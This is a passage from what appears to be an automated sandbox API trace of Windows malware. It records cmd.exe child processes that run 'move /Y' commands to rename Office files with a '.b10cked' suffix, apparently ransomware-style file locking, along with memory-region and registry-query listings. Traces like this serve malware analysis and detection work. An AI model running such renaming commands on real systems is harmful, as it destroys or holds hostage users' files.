lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f27c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) 
returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0160.402] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0160.403] _wcsicmp (_String1="VISINT~1.TRX", _String2=".") returned 72 [0160.403] _wcsicmp (_String1="VISINT~1.TRX", _String2="..") returned 72 [0160.403] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visint~1.trx")) returned 0x2020 [0160.403] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0160.403] SetErrorMode (uMode=0x0) returned 0x0 [0160.403] SetErrorMode (uMode=0x1) returned 0x0 [0160.403] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX", nBufferLength=0x104, lpBuffer=0x16ec0c, lpFilePart=0x16ebf4 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX", lpFilePart=0x16ebf4*="VISINT~1.TRX") returned 0x3c [0160.403] SetErrorMode (uMode=0x0) returned 0x1 [0160.403] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0160.403] _wcsicmp (_String1="VISINT~1.TRX", _String2=".") returned 72 [0160.403] _wcsicmp (_String1="VISINT~1.TRX", _String2="..") returned 72 [0160.403] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visint~1.trx")) returned 0x2020 [0160.404] SetErrorMode (uMode=0x0) returned 0x0 [0160.404] SetErrorMode (uMode=0x1) returned 0x0 [0160.404] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX", nBufferLength=0x104, lpBuffer=0x16f088, lpFilePart=0x16ee20 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX", lpFilePart=0x16ee20*="VISINT~1.TRX") returned 0x3c [0160.404] SetErrorMode (uMode=0x0) returned 0x1 [0160.404] SetErrorMode (uMode=0x0) returned 0x0 [0160.404] SetErrorMode (uMode=0x1) returned 0x0 [0160.404] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x16f290, lpFilePart=0x16ee20 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked", lpFilePart=0x16ee20*="VISINTL.DLL.trx_dll.b10cked") returned 0x4b [0160.404] SetErrorMode (uMode=0x0) returned 0x1 [0160.404] SetLastError (dwErrCode=0x0) [0160.404] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visintl.dll.trx_dll.b10cked")) returned 0xffffffff [0160.404] GetLastError 
() returned 0x2 [0160.404] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x16e79c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e79c) returned 0x322130 [0160.404] FindNextFileW (in: hFindFile=0x322130, lpFindFileData=0x16e79c | out: lpFindFileData=0x16e79c) returned 0 [0160.405] GetLastError () returned 0x12 [0160.405] FindClose (in: hFindFile=0x322130 | out: hFindFile=0x322130) returned 1 [0160.406] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x321cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321cc0) returned 0x322130 [0160.407] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x16ea34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0160.407] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x16ea34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x43 [0160.407] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visintl.dll.trx_dll")) returned 0x2020 [0160.407] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked" (normalized: 
"c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0160.407] FindClose (in: hFindFile=0x322130 | out: hFindFile=0x322130) returned 1 [0160.408] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16e9e8 | out: _Buffer=" 1") returned 9 [0160.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.408] GetFileType (hFile=0x7) returned 0x2 [0160.408] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.408] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16e974 | out: lpMode=0x16e974) returned 1 [0160.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.408] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e9a8 | out: lpConsoleScreenBufferInfo=0x16e9a8) returned 1 [0160.408] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0160.409] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16e9e8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0160.409] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16e9cc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16e9cc*=0x1a) returned 1 [0160.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.409] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0160.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.409] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0160.409] _get_osfhandle (_FileHandle=0) returned 0x3 [0160.409] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0160.410] SetConsoleInputExeNameW () returned 0x1 [0160.410] GetConsoleOutputCP () returned 0x1b5 [0160.410] 
GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0160.410] SetThreadUILanguage (LangId=0x0) returned 0x409 [0160.410] exit (_Code=0) Process: id = "273" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166c0" os_pid = "0x928" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22168 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22169 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22170 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22171 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 22172 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22173 start_va = 0x77230000 end_va = 0x7736bfff entry_point 
= 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22174 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22175 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22176 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 22177 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22178 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22179 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22180 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22181 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 22182 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 22183 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22184 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 
region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22185 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22186 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22187 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22188 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22189 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22190 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22191 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22192 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 22193 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" 
(normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22194 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22195 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 22196 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22197 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 22198 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 22199 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 22200 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 22201 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 337 os_tid = 0xe74 [0160.849] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf88c | out: lpSystemTimeAsFileTime=0x1cf88c*(dwLowDateTime=0x9980aa80, dwHighDateTime=0x1d440a9)) [0160.849] GetCurrentProcessId () returned 0x928 [0160.849] GetCurrentThreadId () returned 0xe74 [0160.850] GetTickCount () returned 0x30f3c [0160.850] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf884 | out: lpPerformanceCount=0x1cf884*=21764147061) returned 1 [0160.853] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0160.853] __set_app_type (_Type=0x1) [0160.853] __p__fmode () returned 0x76b331f4 [0160.853] __p__commode () returned 
0x76b331fc [0160.853] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0160.853] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0160.853] GetCurrentThreadId () returned 0xe74 [0160.853] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe74) returned 0x38 [0160.853] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0160.853] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0160.853] SetThreadUILanguage (LangId=0x0) returned 0x409 [0160.855] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0160.855] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf81c | out: phkResult=0x1cf81c*=0x0) returned 0x2 [0160.855] VirtualQuery (in: lpAddress=0x1cf853, lpBuffer=0x1cf7ec, dwLength=0x1c | out: lpBuffer=0x1cf7ec*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.855] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf7ec, dwLength=0x1c | out: lpBuffer=0x1cf7ec*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0160.855] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf7ec, dwLength=0x1c | out: lpBuffer=0x1cf7ec*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0160.855] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf7ec, dwLength=0x1c | out: lpBuffer=0x1cf7ec*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, 
Type=0x20000)) returned 0x1c [0160.855] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf7ec, dwLength=0x1c | out: lpBuffer=0x1cf7ec*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0160.855] GetConsoleOutputCP () returned 0x1b5 [0160.855] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0160.856] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0160.856] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.856] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0160.856] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.856] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0160.856] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.856] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0160.856] _get_osfhandle (_FileHandle=0) returned 0x3 [0160.856] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0160.856] _get_osfhandle (_FileHandle=0) returned 0x3 [0160.856] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0160.856] GetEnvironmentStringsW () returned 0x340210* [0160.857] FreeEnvironmentStringsW (penv=0x340210) returned 1 [0160.857] GetEnvironmentStringsW () returned 0x340210* [0160.857] FreeEnvironmentStringsW (penv=0x340210) returned 1 [0160.857] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce78c | out: phkResult=0x1ce78c*=0x40) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x0, lpData=0x1ce798*=0xa0, lpcbData=0x1ce790*=0x1000) returned 0x2 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce794, 
lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x4, lpData=0x1ce798*=0x1, lpcbData=0x1ce790*=0x4) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x0, lpData=0x1ce798*=0x1, lpcbData=0x1ce790*=0x1000) returned 0x2 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x4, lpData=0x1ce798*=0x0, lpcbData=0x1ce790*=0x4) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x4, lpData=0x1ce798*=0x40, lpcbData=0x1ce790*=0x4) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x4, lpData=0x1ce798*=0x40, lpcbData=0x1ce790*=0x4) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x0, lpData=0x1ce798*=0x40, lpcbData=0x1ce790*=0x1000) returned 0x2 [0160.857] RegCloseKey (hKey=0x40) returned 0x0 [0160.857] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce78c | out: phkResult=0x1ce78c*=0x40) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x0, lpData=0x1ce798*=0x40, lpcbData=0x1ce790*=0x1000) returned 0x2 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x4, 
lpData=0x1ce798*=0x1, lpcbData=0x1ce790*=0x4) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x0, lpData=0x1ce798*=0x1, lpcbData=0x1ce790*=0x1000) returned 0x2 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x4, lpData=0x1ce798*=0x0, lpcbData=0x1ce790*=0x4) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x4, lpData=0x1ce798*=0x9, lpcbData=0x1ce790*=0x4) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x4, lpData=0x1ce798*=0x9, lpcbData=0x1ce790*=0x4) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x0, lpData=0x1ce798*=0x9, lpcbData=0x1ce790*=0x1000) returned 0x2 [0160.857] RegCloseKey (hKey=0x40) returned 0x0 [0160.857] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886382 [0160.857] srand (_Seed=0x5b886382) [0160.857] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked\"" [0160.857] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 